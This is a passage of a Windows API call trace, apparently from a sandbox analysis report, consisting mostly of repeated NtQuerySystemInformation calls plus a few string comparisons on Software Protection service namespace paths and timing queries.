SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7d0, Length=0x28, ResultLength=0x0) [0269.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0269.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0269.285] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7d0, Length=0x28, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x28, ResultLength=0x0) [0269.298] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x28, ResultLength=0x0) [0269.298] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0269.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0269.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x28, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x28, ResultLength=0x0) [0269.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x28, ResultLength=0x0) [0269.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0269.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcb60 | out: lpSystemTimeAsFileTime=0xc751dfcb60*(dwLowDateTime=0x1cb4fab, dwHighDateTime=0x1d5fb6f)) [0269.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0269.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb50, Length=0x28, ResultLength=0x0) [0269.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca68, Length=0x50, ResultLength=0x0) [0269.310] GetTickCount () returned 0x1183a67 [0269.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0269.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0269.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x28, ResultLength=0x0) [0269.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0269.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x28, ResultLength=0x0) [0269.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x28, ResultLength=0x0) [0269.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0269.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x20, ResultLength=0x0) [0269.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x20, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0269.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0269.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0269.320] 